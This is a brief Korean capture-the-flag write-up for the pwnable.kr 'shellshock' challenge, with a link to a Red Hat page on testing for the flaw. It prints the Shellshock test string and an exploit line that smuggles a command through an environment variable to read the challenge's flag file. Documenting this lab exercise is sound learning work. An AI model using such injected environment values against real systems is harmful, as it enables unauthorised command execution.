[Pwnable.kr]-shellshock

shellshock - 1pt문제 

 

shellshock.c 의 내용은 다음과 같다

그후 shellshock 의 취약점은 env x='() { :;}; echo pwnable!' bash -c 'echo safe~' 로 확인 할 수 있다.

env x='() { :;}; /bin/cat flag' ./shellshock 으로 적용하게된다면 원하는 것을 실행 할 수 있게된다.

그후 bash 로딩후 슥삭

취약점 확인방법은
https://access.redhat.com/blogs/766093/posts/1976383 을 참고하기바란다.